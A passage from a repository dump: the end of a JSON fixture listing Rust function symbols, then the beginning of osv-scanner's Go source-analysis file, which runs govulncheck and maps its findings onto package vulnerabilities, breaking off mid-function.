"rustc_demangle::Demangle::fmt": {}, "rustc_demangle::DemangleStyle::fmt": {}, "rustc_demangle::SizeLimitExhausted::fmt": {}, "rustc_demangle::SizeLimitedFmtAdapter::write_str": {}, "rustc_demangle::demangle": {}, "rustc_demangle::demangle::{{closure}}": {}, "rustc_demangle::is_ascii_punctuation": {}, "rustc_demangle::is_symbol_like": {}, "rustc_demangle::is_symbol_like::{{closure}}": {}, "rustc_demangle::legacy::Demangle::fmt": {}, "rustc_demangle::legacy::Demangle::fmt::{{closure}}": {}, "rustc_demangle::legacy::demangle": {}, "rustc_demangle::legacy::demangle::{{closure}}": {}, "rustc_demangle::legacy::is_rust_hash": {}, "rustc_demangle::legacy::is_rust_hash::{{closure}}": {}, "rustc_demangle::try_demangle": {}, "rustc_demangle::v0::Demangle::fmt": {}, "rustc_demangle::v0::HexNibbles::try_parse_str_chars": {}, "rustc_demangle::v0::HexNibbles::try_parse_str_chars::{{closure}}": {}, "rustc_demangle::v0::HexNibbles::try_parse_str_chars::{{closure}}::{{closure}}": {}, "rustc_demangle::v0::HexNibbles::try_parse_str_chars::{{closure}}::{{closure}}::utf8_len_from_first_byte": {}, "rustc_demangle::v0::HexNibbles::try_parse_uint": {}, "rustc_demangle::v0::Ident::fmt": {}, "rustc_demangle::v0::Ident::fmt::{{closure}}": {}, "rustc_demangle::v0::Ident::punycode_decode": {}, "rustc_demangle::v0::Ident::try_small_punycode_decode": {}, "rustc_demangle::v0::Ident::try_small_punycode_decode::{{closure}}": {}, "rustc_demangle::v0::ParseError::message": {}, "rustc_demangle::v0::Parser::backref": {}, "rustc_demangle::v0::Parser::digit_10": {}, "rustc_demangle::v0::Parser::digit_62": {}, "rustc_demangle::v0::Parser::disambiguator": {}, "rustc_demangle::v0::Parser::eat": {}, "rustc_demangle::v0::Parser::hex_nibbles": {}, "rustc_demangle::v0::Parser::ident": {}, "rustc_demangle::v0::Parser::ident::{{closure}}": {}, "rustc_demangle::v0::Parser::integer_62": {}, "rustc_demangle::v0::Parser::namespace": {}, "rustc_demangle::v0::Parser::next": {}, 
"rustc_demangle::v0::Parser::opt_integer_62": {}, "rustc_demangle::v0::Parser::peek": {}, "rustc_demangle::v0::Parser::pop_depth": {}, "rustc_demangle::v0::Parser::push_depth": {}, "rustc_demangle::v0::Printer::eat": {}, "rustc_demangle::v0::Printer::eat::{{closure}}": {}, "rustc_demangle::v0::Printer::in_binder": {}, "rustc_demangle::v0::Printer::pop_depth": {}, "rustc_demangle::v0::Printer::print": {}, "rustc_demangle::v0::Printer::print_backref": {}, "rustc_demangle::v0::Printer::print_const": {}, "rustc_demangle::v0::Printer::print_const::{{closure}}": {}, "rustc_demangle::v0::Printer::print_const_str_literal": {}, "rustc_demangle::v0::Printer::print_const_uint": {}, "rustc_demangle::v0::Printer::print_dyn_trait": {}, "rustc_demangle::v0::Printer::print_generic_arg": {}, "rustc_demangle::v0::Printer::print_lifetime_from_index": {}, "rustc_demangle::v0::Printer::print_path": {}, "rustc_demangle::v0::Printer::print_path::{{closure}}": {}, "rustc_demangle::v0::Printer::print_path_maybe_open_generics": {}, "rustc_demangle::v0::Printer::print_path_maybe_open_generics::{{closure}}": {}, "rustc_demangle::v0::Printer::print_quoted_escaped_chars": {}, "rustc_demangle::v0::Printer::print_sep_list": {}, "rustc_demangle::v0::Printer::print_type": {}, "rustc_demangle::v0::Printer::print_type::{{closure}}": {}, "rustc_demangle::v0::Printer::skipping_printing": {}, "rustc_demangle::v0::basic_type": {}, "rustc_demangle::v0::demangle": {}, "rustc_demangle::v0::demangle::{{closure}}": {}, "smallvec::SmallVec::deref": {}, "smallvec::SmallVec::drop": {}, "smallvec::SmallVec::fmt": {}, "smallvec::SmallVec::insert_many": {}, "smallvec::SmallVec::push": {}, "smallvec::SmallVec::set_len": {}, "smallvec::SmallVec::spilled": {}, "smallvec::SmallVec::triple": {}, "smallvec::SmallVecData::heap": {}, "smallvec::SmallVecData::inline": {}, "std::alloc::default_alloc_error_hook": {}, "std::backtrace_rs::backtrace::Frame::ip": {}, "std::backtrace_rs::backtrace::libunwind::Frame::ip": {}, 
"std::backtrace_rs::backtrace::libunwind::trace": {}, "std::backtrace_rs::backtrace::libunwind::trace::trace_fn": {}, "std::backtrace_rs::backtrace::trace_unsynchronized": {}, "std::backtrace_rs::print::BacktraceFmt::new": {}, "std::backtrace_rs::print::BacktraceFrameFmt::drop": {}, "std::backtrace_rs::print::BacktraceFrameFmt::print_fileline": {}, "std::backtrace_rs::print::BacktraceFrameFmt::print_raw": {}, "std::backtrace_rs::print::BacktraceFrameFmt::print_raw_generic": {}, "std::backtrace_rs::print::BacktraceFrameFmt::print_raw_with_column": {}, "std::backtrace_rs::print::BacktraceFrameFmt::symbol": {}, "std::backtrace_rs::print::PrintFmt::eq": {}, "std::backtrace_rs::symbolize::ResolveWhat::address_or_ip": {}, "std::backtrace_rs::symbolize::Symbol::colno": {}, "std::backtrace_rs::symbolize::Symbol::filename_raw": {}, "std::backtrace_rs::symbolize::Symbol::lineno": {}, "std::backtrace_rs::symbolize::Symbol::name": {}, "std::backtrace_rs::symbolize::SymbolName::as_str": {}, "std::backtrace_rs::symbolize::SymbolName::as_str::{{closure}}": {}, "std::backtrace_rs::symbolize::SymbolName::fmt": {}, "std::backtrace_rs::symbolize::format_symbol_name": {}, "std::backtrace_rs::symbolize::gimli::Cache::avma_to_svma": {}, "std::backtrace_rs::symbolize::gimli::Cache::avma_to_svma::{{closure}}": {}, "std::backtrace_rs::symbolize::gimli::Cache::avma_to_svma::{{closure}}::{{closure}}": {}, "std::backtrace_rs::symbolize::gimli::Cache::mapping_for_lib": {}, "std::backtrace_rs::symbolize::gimli::Cache::mapping_for_lib::{{closure}}": {}, "std::backtrace_rs::symbolize::gimli::Cache::new": {}, "std::backtrace_rs::symbolize::gimli::Cache::with_global": {}, "std::backtrace_rs::symbolize::gimli::Cache::with_global::{{closure}}": {}, "std::backtrace_rs::symbolize::gimli::Context::new": {}, "std::backtrace_rs::symbolize::gimli::Context::new::{{closure}}": {}, "std::backtrace_rs::symbolize::gimli::Mapping::mk": {}, "std::backtrace_rs::symbolize::gimli::Mapping::mk::{{closure}}": {}, 
"std::backtrace_rs::symbolize::gimli::Mapping::mk_or_other": {}, "std::backtrace_rs::symbolize::gimli::Symbol::colno": {}, "std::backtrace_rs::symbolize::gimli::Symbol::filename_raw": {}, "std::backtrace_rs::symbolize::gimli::Symbol::lineno": {}, "std::backtrace_rs::symbolize::gimli::Symbol::name": {}, "std::backtrace_rs::symbolize::gimli::elf::\u003cimpl std::backtrace_rs::symbolize::gimli::Mapping\u003e::new": {}, "std::backtrace_rs::symbolize::gimli::elf::\u003cimpl std::backtrace_rs::symbolize::gimli::Mapping\u003e::new::{{closure}}": {}, "std::backtrace_rs::symbolize::gimli::elf::\u003cimpl std::backtrace_rs::symbolize::gimli::Mapping\u003e::new_debug": {}, "std::backtrace_rs::symbolize::gimli::elf::\u003cimpl std::backtrace_rs::symbolize::gimli::Mapping\u003e::new_debug::{{closure}}": {}, "std::backtrace_rs::symbolize::gimli::elf::Object::build_id": {}, "std::backtrace_rs::symbolize::gimli::elf::Object::gnu_debugaltlink_path": {}, "std::backtrace_rs::symbolize::gimli::elf::Object::gnu_debugaltlink_path::{{closure}}": {}, "std::backtrace_rs::symbolize::gimli::elf::Object::gnu_debuglink_path": {}, "std::backtrace_rs::symbolize::gimli::elf::Object::gnu_debuglink_path::{{closure}}": {}, "std::backtrace_rs::symbolize::gimli::elf::Object::parse": {}, "std::backtrace_rs::symbolize::gimli::elf::Object::parse::{{closure}}": {}, "std::backtrace_rs::symbolize::gimli::elf::Object::search_symtab": {}, "std::backtrace_rs::symbolize::gimli::elf::Object::section": {}, "std::backtrace_rs::symbolize::gimli::elf::Object::section::{{closure}}": {}, "std::backtrace_rs::symbolize::gimli::elf::Object::section_header": {}, "std::backtrace_rs::symbolize::gimli::elf::debug_path_exists": {}, "std::backtrace_rs::symbolize::gimli::elf::decompress_zlib": {}, "std::backtrace_rs::symbolize::gimli::elf::hex": {}, "std::backtrace_rs::symbolize::gimli::elf::locate_build_id": {}, "std::backtrace_rs::symbolize::gimli::elf::locate_debugaltlink": {}, 
"std::backtrace_rs::symbolize::gimli::elf::locate_debuglink": {}, "std::backtrace_rs::symbolize::gimli::libs_dl_iterate_phdr::callback": {}, "std::backtrace_rs::symbolize::gimli::libs_dl_iterate_phdr::native_libraries": {}, "std::backtrace_rs::symbolize::gimli::mmap": {}, "std::backtrace_rs::symbolize::gimli::mmap::Mmap::drop": {}, "std::backtrace_rs::symbolize::gimli::mmap::Mmap::map": {}, "std::backtrace_rs::symbolize::gimli::resolve": {}, "std::backtrace_rs::symbolize::gimli::resolve::{{closure}}": {}, "std::backtrace_rs::symbolize::gimli::stash::Stash::allocate": {}, "std::backtrace_rs::symbolize::gimli::stash::Stash::new": {}, "std::backtrace_rs::symbolize::gimli::stash::Stash::set_mmap_aux": {}, "std::backtrace_rs::symbolize::resolve_frame_unsynchronized": {}, "std::env::current_dir": {}, "std::env::current_exe": {}, "std::env::var_os": {}, "std::ffi::os_str::OsStr::display": {}, "std::ffi::os_str::OsStr::eq": {}, "std::ffi::os_str::OsStr::to_os_string": {}, "std::ffi::os_str::OsStr::to_owned": {}, "std::ffi::os_str::OsStr::to_str": {}, "std::ffi::os_str::OsString::eq": {}, "std::ffi::os_str::OsString::push": {}, "std::ffi::os_str::OsString::with_capacity": {}, "std::fs::File::metadata": {}, "std::fs::File::open": {}, "std::fs::FileType::is_dir": {}, "std::fs::FileType::is_file": {}, "std::fs::Metadata::is_dir": {}, "std::fs::Metadata::is_file": {}, "std::fs::OpenOptions::open": {}, "std::fs::canonicalize": {}, "std::fs::metadata": {}, "std::fs::read_link": {}, "std::io::Read::read_exact": {}, "std::io::Read::read_to_end": {}, "std::io::Take::read": {}, "std::io::Take::read_buf": {}, "std::io::Write::write_all": {}, "std::io::Write::write_fmt": {}, "std::io::Write::write_fmt::Adapter::write_str": {}, "std::io::buffered::bufwriter::BufWriter::drop": {}, "std::io::buffered::bufwriter::BufWriter::flush_buf": {}, "std::io::buffered::bufwriter::BufWriter::flush_buf::BufGuard::consume": {}, "std::io::buffered::bufwriter::BufWriter::flush_buf::BufGuard::done": {}, 
"std::io::buffered::bufwriter::BufWriter::flush_buf::BufGuard::drop": {}, "std::io::buffered::bufwriter::BufWriter::flush_buf::BufGuard::remaining": {}, "std::io::buffered::bufwriter::BufWriter::spare_capacity": {}, "std::io::buffered::bufwriter::BufWriter::with_capacity": {}, "std::io::buffered::bufwriter::BufWriter::write_all": {}, "std::io::buffered::bufwriter::BufWriter::write_all_cold": {}, "std::io::buffered::bufwriter::BufWriter::write_to_buffer_unchecked": {}, "std::io::buffered::linewriter::LineWriter::new": {}, "std::io::buffered::linewriter::LineWriter::with_capacity": {}, "std::io::buffered::linewriter::LineWriter::write_all": {}, "std::io::buffered::linewritershim::LineWriterShim::buffered": {}, "std::io::buffered::linewritershim::LineWriterShim::flush_if_completed_line": {}, "std::io::buffered::linewritershim::LineWriterShim::write_all": {}, "std::io::default_read_exact": {}, "std::io::default_read_to_end": {}, "std::io::error::\u003cimpl core::fmt::Debug for std::io::error::repr_bitpacked::Repr\u003e::fmt": {}, "std::io::error::Custom::fmt": {}, "std::io::error::Error::fmt": {}, "std::io::error::Error::from": {}, "std::io::error::Error::from_raw_os_error": {}, "std::io::error::Error::kind": {}, "std::io::error::Error::last_os_error": {}, "std::io::error::Error::new": {}, "std::io::error::ErrorKind::eq": {}, "std::io::error::ErrorKind::fmt": {}, "std::io::error::repr_bitpacked::Repr::data": {}, "std::io::error::repr_bitpacked::Repr::drop": {}, "std::io::error::repr_bitpacked::Repr::new_custom": {}, "std::io::error::repr_bitpacked::Repr::new_os": {}, "std::io::error::repr_bitpacked::decode_repr": {}, "std::io::error::repr_bitpacked::kind_from_prim": {}, "std::io::impls::\u003cimpl std::io::Read for \u0026[u8]\u003e::read": {}, "std::io::impls::\u003cimpl std::io::Read for \u0026[u8]\u003e::read_buf": {}, "std::io::impls::\u003cimpl std::io::Read for \u0026[u8]\u003e::read_exact": {}, "std::io::impls::\u003cimpl std::io::Read for \u0026mut 
R\u003e::read": {}, "std::io::impls::\u003cimpl std::io::Read for \u0026mut R\u003e::read_buf": {}, "std::io::impls::\u003cimpl std::io::Read for \u0026mut R\u003e::read_exact": {}, "std::io::impls::\u003cimpl std::io::Write for \u0026mut W\u003e::write_all": {}, "std::io::impls::\u003cimpl std::io::Write for alloc::vec::Vec\u003e::write_all": {}, "std::io::readbuf::BorrowedBuf::filled": {}, "std::io::readbuf::BorrowedCursor::append": {}, "std::io::readbuf::BorrowedCursor::init_ref": {}, "std::io::readbuf::BorrowedCursor::set_init": {}, "std::io::stdio::Stderr::lock": {}, "std::io::stdio::Stderr::write_fmt": {}, "std::io::stdio::StderrLock::write_all": {}, "std::io::stdio::StderrRaw::write_all": {}, "std::io::stdio::Stdout::lock": {}, "std::io::stdio::Stdout::write_fmt": {}, "std::io::stdio::StdoutLock::write_all": {}, "std::io::stdio::StdoutRaw::write": {}, "std::io::stdio::StdoutRaw::write_all": {}, "std::io::stdio::cleanup": {}, "std::io::stdio::cleanup::{{closure}}": {}, "std::io::stdio::eprint": {}, "std::io::stdio::handle_ebadf": {}, "std::io::stdio::print": {}, "std::io::stdio::print_to": {}, "std::io::stdio::stdout": {}, "std::io::stdio::stdout::{{closure}}": {}, "std::os::fd::owned::OwnedFd::drop": {}, "std::panic::BacktraceStyle::as_usize": {}, "std::panic::BacktraceStyle::from_usize": {}, "std::panic::get_backtrace_style": {}, "std::panic::get_backtrace_style::{{closure}}": {}, "std::panic::set_backtrace_style": {}, "std::panicking::begin_panic_handler::PanicPayload::fill": {}, "std::panicking::begin_panic_handler::PanicPayload::fill::{{closure}}": {}, "std::panicking::begin_panic_handler::PanicPayload::get": {}, "std::panicking::begin_panic_handler::PanicPayload::new": {}, "std::panicking::begin_panic_handler::PanicPayload::take_box": {}, "std::panicking::begin_panic_handler::StrPanicPayload::get": {}, "std::panicking::begin_panic_handler::StrPanicPayload::take_box": {}, "std::panicking::begin_panic_handler::{{closure}}": {}, 
"std::panicking::default_hook": {}, "std::panicking::default_hook::{{closure}}": {}, "std::panicking::panic_count::increase": {}, "std::panicking::panic_count::increase::{{closure}}": {}, "std::panicking::rust_panic_with_hook": {}, "std::path::\u003cimpl core::convert::AsRef\u003cstd::path::Path\u003e for std::ffi::os_str::OsString\u003e::as_ref": {}, "std::path::Component::eq": {}, "std::path::Components::as_path": {}, "std::path::Components::clone": {}, "std::path::Components::eq": {}, "std::path::Components::finished": {}, "std::path::Components::has_root": {}, "std::path::Components::include_cur_dir": {}, "std::path::Components::is_sep_byte": {}, "std::path::Components::len_before_body": {}, "std::path::Components::next": {}, "std::path::Components::next_back": {}, "std::path::Components::parse_next_component": {}, "std::path::Components::parse_next_component::{{closure}}": {}, "std::path::Components::parse_next_component_back": {}, "std::path::Components::parse_next_component_back::{{closure}}": {}, "std::path::Components::parse_single_component": {}, "std::path::Components::prefix_len": {}, "std::path::Components::prefix_remaining": {}, "std::path::Components::prefix_verbatim": {}, "std::path::Components::trim_left": {}, "std::path::Components::trim_right": {}, "std::path::Display::fmt": {}, "std::path::Path::components": {}, "std::path::Path::has_root": {}, "std::path::Path::is_absolute": {}, "std::path::Path::is_dir": {}, "std::path::Path::is_dir::{{closure}}": {}, "std::path::Path::is_file": {}, "std::path::Path::is_file::{{closure}}": {}, "std::path::Path::parent": {}, "std::path::Path::parent::{{closure}}": {}, "std::path::Path::strip_prefix": {}, "std::path::Path::strip_prefix::{{closure}}": {}, "std::path::Path::to_str": {}, "std::path::PathBuf::deref": {}, "std::path::PathBuf::eq": {}, "std::path::PathBuf::from": {}, "std::path::PathBuf::push": {}, "std::path::PathBuf::push::{{closure}}": {}, "std::path::Prefix::clone": {}, "std::path::Prefix::eq": 
{}, "std::path::Prefix::len": {}, "std::path::PrefixComponent::eq": {}, "std::path::State::clone": {}, "std::path::State::eq": {}, "std::path::State::partial_cmp": {}, "std::path::StripPrefixError::fmt": {}, "std::path::has_physical_root": {}, "std::path::iter_after": {}, "std::personality::dwarf::DwarfReader::read": {}, "std::personality::dwarf::DwarfReader::read_sleb128": {}, "std::personality::dwarf::DwarfReader::read_uleb128": {}, "std::personality::dwarf::eh::find_eh_action": {}, "std::personality::dwarf::eh::read_encoded_pointer": {}, "std::personality::dwarf::eh::round_up": {}, "std::personality::gcc::find_eh_action": {}, "std::personality::gcc::find_eh_action::{{closure}}": {}, "std::personality::gcc::rust_eh_personality_impl": {}, "std::process::abort": {}, "std::rt::cleanup::{{closure}}": {}, "std::rt::lang_start_internal::{{closure}}": {}, "std::sync::once::Once::call_inner": {}, "std::sync::once::Once::call_once::{{closure}}": {}, "std::sync::once::Once::call_once_force": {}, "std::sync::once::Once::call_once_force::{{closure}}": {}, "std::sync::once::Once::is_completed": {}, "std::sync::once::WaiterQueue::drop": {}, "std::sync::once::wait": {}, "std::sync::once_lock::OnceLock::get": {}, "std::sync::once_lock::OnceLock::get_or_init": {}, "std::sync::once_lock::OnceLock::get_or_init::{{closure}}": {}, "std::sync::once_lock::OnceLock::get_or_try_init": {}, "std::sync::once_lock::OnceLock::initialize": {}, "std::sync::once_lock::OnceLock::initialize::{{closure}}": {}, "std::sync::once_lock::OnceLock::is_initialized": {}, "std::sys::common::alloc::realloc_fallback": {}, "std::sys::unix::abort_internal": {}, "std::sys::unix::alloc::\u003cimpl core::alloc::global::GlobalAlloc for std::alloc::System\u003e::alloc": {}, "std::sys::unix::alloc::\u003cimpl core::alloc::global::GlobalAlloc for std::alloc::System\u003e::alloc_zeroed": {}, "std::sys::unix::alloc::\u003cimpl core::alloc::global::GlobalAlloc for std::alloc::System\u003e::dealloc": {}, 
"std::sys::unix::alloc::\u003cimpl core::alloc::global::GlobalAlloc for std::alloc::System\u003e::realloc": {}, "std::sys::unix::alloc::aligned_malloc": {}, "std::sys::unix::args::imp::ARGV_INIT_ARRAY::init_wrapper": {}, "std::sys::unix::cleanup": {}, "std::sys::unix::cvt": {}, "std::sys::unix::cvt_r": {}, "std::sys::unix::decode_error_kind": {}, "std::sys::unix::fd::FileDesc::write": {}, "std::sys::unix::fs::File::file_attr": {}, "std::sys::unix::fs::File::open": {}, "std::sys::unix::fs::File::open_c": {}, "std::sys::unix::fs::File::open_c::{{closure}}": {}, "std::sys::unix::fs::FileType::is": {}, "std::sys::unix::fs::FileType::is_dir": {}, "std::sys::unix::fs::FileType::is_file": {}, "std::sys::unix::fs::canonicalize": {}, "std::sys::unix::fs::cstr": {}, "std::sys::unix::fs::readlink": {}, "std::sys::unix::fs::stat": {}, "std::sys::unix::fs::try_statx": {}, "std::sys::unix::fs::try_statx::statx": {}, "std::sys::unix::futex::futex_wait": {}, "std::sys::unix::futex::futex_wait::{{closure}}": {}, "std::sys::unix::futex::futex_wake": {}, "std::sys::unix::futex::futex_wake_all": {}, "std::sys::unix::locks::futex_mutex::Mutex::lock": {}, "std::sys::unix::locks::futex_mutex::Mutex::lock_contended": {}, "std::sys::unix::locks::futex_mutex::Mutex::spin": {}, "std::sys::unix::locks::futex_mutex::Mutex::try_lock": {}, "std::sys::unix::locks::futex_mutex::Mutex::unlock": {}, "std::sys::unix::locks::futex_mutex::Mutex::wake": {}, "std::sys::unix::locks::futex_rwlock::RwLock::read": {}, "std::sys::unix::locks::futex_rwlock::RwLock::read_contended": {}, "std::sys::unix::locks::futex_rwlock::RwLock::read_unlock": {}, "std::sys::unix::locks::futex_rwlock::RwLock::spin_read": {}, "std::sys::unix::locks::futex_rwlock::RwLock::spin_read::{{closure}}": {}, "std::sys::unix::locks::futex_rwlock::RwLock::spin_until": {}, "std::sys::unix::locks::futex_rwlock::RwLock::wake_writer": {}, "std::sys::unix::locks::futex_rwlock::RwLock::wake_writer_or_readers": {}, 
"std::sys::unix::locks::futex_rwlock::has_reached_max_readers": {}, "std::sys::unix::locks::futex_rwlock::is_read_lockable": {}, "std::sys::unix::locks::futex_rwlock::is_unlocked": {}, "std::sys::unix::memchr::memrchr": {}, "std::sys::unix::memchr::memrchr::memrchr_specific": {}, "std::sys::unix::os::current_exe": {}, "std::sys::unix::os::env_read_lock": {}, "std::sys::unix::os::errno": {}, "std::sys::unix::os::error_string": {}, "std::sys::unix::os::getcwd": {}, "std::sys::unix::os::getenv": {}, "std::sys::unix::os::page_size": {}, "std::sys::unix::os_str::Buf::push_slice": {}, "std::sys::unix::os_str::Buf::with_capacity": {}, "std::sys::unix::os_str::Slice::fmt": {}, "std::sys::unix::os_str::Slice::to_owned": {}, "std::sys::unix::os_str::Slice::to_str": {}, "std::sys::unix::path::is_sep_byte": {}, "std::sys::unix::stack_overflow::imp::cleanup": {}, "std::sys::unix::stack_overflow::imp::drop_handler": {}, "std::sys::unix::stack_overflow::imp::signal_handler": {}, "std::sys::unix::stdio::Stderr::write": {}, "std::sys::unix::stdio::Stdout::write": {}, "std::sys::unix::stdio::is_ebadf": {}, "std::sys::unix::thread_local_dtor::register_dtor": {}, "std::sys::unix::thread_local_key::create": {}, "std::sys::unix::thread_local_key::destroy": {}, "std::sys::unix::thread_local_key::get": {}, "std::sys::unix::thread_local_key::set": {}, "std::sys::unix::time::SystemTime::sub_time": {}, "std::sys::unix::time::Timespec::checked_add_duration": {}, "std::sys::unix::time::Timespec::partial_cmp": {}, "std::sys::unix::time::Timespec::sub_timespec": {}, "std::sys::unix::time::Timespec::to_timespec": {}, "std::sys::unix::time::inner::\u003cimpl std::sys::unix::time::SystemTime\u003e::now": {}, "std::sys::unix::time::inner::\u003cimpl std::sys::unix::time::Timespec\u003e::now": {}, "std::sys_common::backtrace::_print::DisplayBacktrace::fmt": {}, "std::sys_common::backtrace::_rust_begin_short_backtrace": {}, "std::sys_common::backtrace::_rust_end_short_backtrace": {}, 
"std::sys_common::backtrace::lock": {}, "std::sys_common::backtrace::output_filename": {}, "std::sys_common::backtrace::print": {}, "std::sys_common::backtrace::print_fmt": {}, "std::sys_common::backtrace::print_fmt::{{closure}}": {}, "std::sys_common::backtrace::print_fmt::{{closure}}::{{closure}}": {}, "std::sys_common::backtrace::print_fmt::{{closure}}::{{closure}}::{{closure}}": {}, "std::sys_common::memchr::memrchr": {}, "std::sys_common::mutex::MovableMutex::raw_lock": {}, "std::sys_common::mutex::MovableMutex::raw_unlock": {}, "std::sys_common::mutex::MovableMutex::try_lock": {}, "std::sys_common::mutex::StaticMutex::lock": {}, "std::sys_common::mutex::StaticMutexGuard::drop": {}, "std::sys_common::remutex::ReentrantMutex::increment_lock_count": {}, "std::sys_common::remutex::ReentrantMutex::lock": {}, "std::sys_common::remutex::ReentrantMutex::try_lock": {}, "std::sys_common::remutex::ReentrantMutexGuard::drop": {}, "std::sys_common::rwlock::StaticRwLock::read": {}, "std::sys_common::rwlock::StaticRwLockReadGuard::drop": {}, "std::sys_common::thread_info::THREAD_INFO::_getit": {}, "std::sys_common::thread_info::THREAD_INFO::_getit::destroy": {}, "std::sys_common::thread_info::ThreadInfo::with": {}, "std::sys_common::thread_info::ThreadInfo::with::{{closure}}": {}, "std::sys_common::thread_info::ThreadInfo::with::{{closure}}::{{closure}}": {}, "std::sys_common::thread_info::current_thread": {}, "std::sys_common::thread_info::current_thread::{{closure}}": {}, "std::sys_common::thread_info::stack_guard": {}, "std::sys_common::thread_info::stack_guard::{{closure}}": {}, "std::sys_common::thread_local_dtor::register_dtor_fallback": {}, "std::sys_common::thread_local_dtor::register_dtor_fallback::run_dtors": {}, "std::sys_common::thread_local_key::StaticKey::get": {}, "std::sys_common::thread_local_key::StaticKey::key": {}, "std::sys_common::thread_local_key::StaticKey::lazy_init": {}, "std::sys_common::thread_local_key::StaticKey::set": {}, 
"std::sys_common::thread_parker::futex::Parker::new": {}, "std::sys_common::thread_parker::futex::Parker::park": {}, "std::sys_common::thread_parker::futex::Parker::unpark": {}, "std::thread::Thread::clone": {}, "std::thread::Thread::cname": {}, "std::thread::Thread::name": {}, "std::thread::Thread::new": {}, "std::thread::Thread::unpark": {}, "std::thread::ThreadId::new": {}, "std::thread::ThreadId::new::exhausted": {}, "std::thread::current": {}, "std::thread::local::AccessError::fmt": {}, "std::thread::local::LocalKey::try_with": {}, "std::thread::local::LocalKey::with": {}, "std::thread::local::fast::Key::register_dtor": {}, "std::thread::park": {}, "std::time::SystemTime::duration_since": {}, "std::time::SystemTime::elapsed": {}, "std::time::SystemTime::now": {}, "str::fmt": {}, "test_rust_2::C::test_aabbee": {}, "test_rust_2::main": {}, "test_rust_2::other_item_123": {}, "u16::div": {}, "u16::forward_unchecked": {}, "u16::to_u64": {}, "u16::to_u8": {}, "u32::add": {}, "u32::checked_add": {}, "u32::checked_mul": {}, "u32::div": {}, "u32::shl": {}, "u32::to_u64": {}, "u32::to_u8": {}, "u64::add": {}, "u64::checked_add": {}, "u64::checked_mul": {}, "u64::div": {}, "u64::forward_unchecked": {}, "u64::from_u32": {}, "u64::mul": {}, "u64::to_u64": {}, "u64::to_u8": {}, "u8::bitand": {}, "u8::div": {}, "u8::from_elem": {}, "u8::rem": {}, "u8::to_u64": {}, "usize::add": {}, "usize::add_assign": {}, "usize::backward_unchecked": {}, "usize::div": {}, "usize::forward_unchecked": {}, "usize::from_u64": {}, "usize::from_u8": {}, "usize::get": {}, "usize::get_unchecked": {}, "usize::get_unchecked_mut": {}, "usize::index": {}, "usize::index_mut": {}, "usize::sub": {}, "usize::sum": {}, "usize::sum::{{closure}}": {}, "usize::to_u8": {} } --- ================================================ FILE: internal/sourceanalysis/go.go ================================================ // Package sourceanalysis provides functionality for performing source analysis on code. 
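package sourceanalysis

import (
	"bytes"
	"context"
	"encoding/json"
	"fmt"
	"io"
	"os"
	"os/exec"
	"path/filepath"

	"github.com/google/osv-scanner/v2/internal/cmdlogger"
	"github.com/google/osv-scanner/v2/internal/sourceanalysis/govulncheck"
	"github.com/google/osv-scanner/v2/internal/url"
	"github.com/google/osv-scanner/v2/pkg/models"
	"github.com/ossf/osv-schema/bindings/go/osvschema"
	"golang.org/x/vuln/scan"
	"google.golang.org/protobuf/encoding/protojson"
)

// goAnalysis runs govulncheck-based call analysis for the Go module that owns
// source.Path and records the result on the vulnerability groups of pkgs.
//
// It returns without touching pkgs when `go version` cannot be executed or
// when runGovulncheck fails; both cases are logged rather than returned.
func goAnalysis(pkgs []models.PackageVulns, source models.SourceInfo) {
	// TODO: This will be moved to enrichers which does have context.
	cmd := exec.CommandContext(context.TODO(), "go", "version")
	_, err := cmd.Output()
	if err != nil {
		cmdlogger.Infof("Skipping call analysis on Go code since Go is not installed.")
		return
	}

	// Set GOVERSION to the Go version in go.mod.
	// NOTE(review): goVersion stays empty when pkgs has no "stdlib" entry, in
	// which case runGovulncheck exports the bare value "GOVERSION=go" — confirm
	// that govulncheck tolerates it.
	var goVersion string
	for _, pkg := range pkgs {
		if pkg.Package.Name == "stdlib" {
			goVersion = pkg.Package.Version
			break
		}
	}

	vulns, vulnsByID := vulnsFromAllPkgs(pkgs)

	// Filter out advisories with no symbol information first
	// This is purely an optimisation step, further filtering is done in matchAnalysisWithPackageVulns function
	filteredVulns := []*osvschema.Vulnerability{}
	for _, vuln := range vulns {
		if vulnHasImportsField(vuln, nil) {
			filteredVulns = append(filteredVulns, vuln)
		}
	}

	res, err := runGovulncheck(filepath.Dir(source.Path), filteredVulns, goVersion)
	if err != nil {
		// TODO: Better method to identify the type of error and give advice specific to the error
		cmdlogger.Errorf(
			"Failed to run code analysis (govulncheck) on '%s' because %s\n"+
				"(the Go toolchain is required)",
			source.Path,
			err.Error(),
		)

		return
	}

	matchAnalysisWithPackageVulns(pkgs, res, vulnsByID)
}

// matchAnalysisWithPackageVulns copies govulncheck findings onto the
// ExperimentalAnalysis map of every vulnerability group in pkgs.
//
// idToFindings is keyed by OSV ID; the first trace frame of each finding gives
// the module path, and a non-empty Function on that frame counts as "called".
// vulnsByID is used to decide whether an advisory carries symbol information.
func matchAnalysisWithPackageVulns(pkgs []models.PackageVulns, idToFindings map[string][]*govulncheck.Finding, vulnsByID map[string]*osvschema.Vulnerability) {
	idToModuleToCalled := map[string]map[string]bool{}
	for id, findings := range idToFindings {
		if idToModuleToCalled[id] == nil {
			idToModuleToCalled[id] = map[string]bool{}
		}
		for _, f := range findings {
			// A finding without a usable first frame carries no module to
			// attribute the result to; indexing Trace[0] would panic.
			if f == nil || len(f.Trace) == 0 || f.Trace[0] == nil {
				continue
			}
			modulePath := f.Trace[0].Module
			called := f.Trace[0].Function != ""

			// Keyed by f.OSV as before, but the inner map is created on demand
			// so a finding filed under a different key cannot hit a nil map.
			moduleToCalled := idToModuleToCalled[f.OSV]
			if moduleToCalled == nil {
				moduleToCalled = map[string]bool{}
				idToModuleToCalled[f.OSV] = moduleToCalled
			}
			// Once any finding shows a call into the module, keep it marked as
			// called: a later import-only finding for the same module must not
			// downgrade the result to "not called".
			moduleToCalled[modulePath] = moduleToCalled[modulePath] || called
		}
	}

	for _, pv := range pkgs {
		// Use index to keep reference to original element in slice
		for groupIdx := range pv.Groups {
			for _, vulnID := range pv.Groups[groupIdx].IDs {
				analysis := &pv.Groups[groupIdx].ExperimentalAnalysis
				if *analysis == nil {
					*analysis = make(map[string]models.AnalysisInfo)
				}

				moduleToCalled, ok := idToModuleToCalled[vulnID]
				if !ok {
					// If vulnerability not found, check if it contains any source information
					fillNotImportedAnalysisInfo(vulnsByID, vulnID, pv, analysis)
					continue
				}
				pkg := pv.Package
				if !vulnHasImportsField(vulnsByID[vulnID], &pkg) && moduleToCalled[pv.Package.Name] {
					// Vuln entry does not have any symbol information, therefore called being true is not useful
					continue
				}
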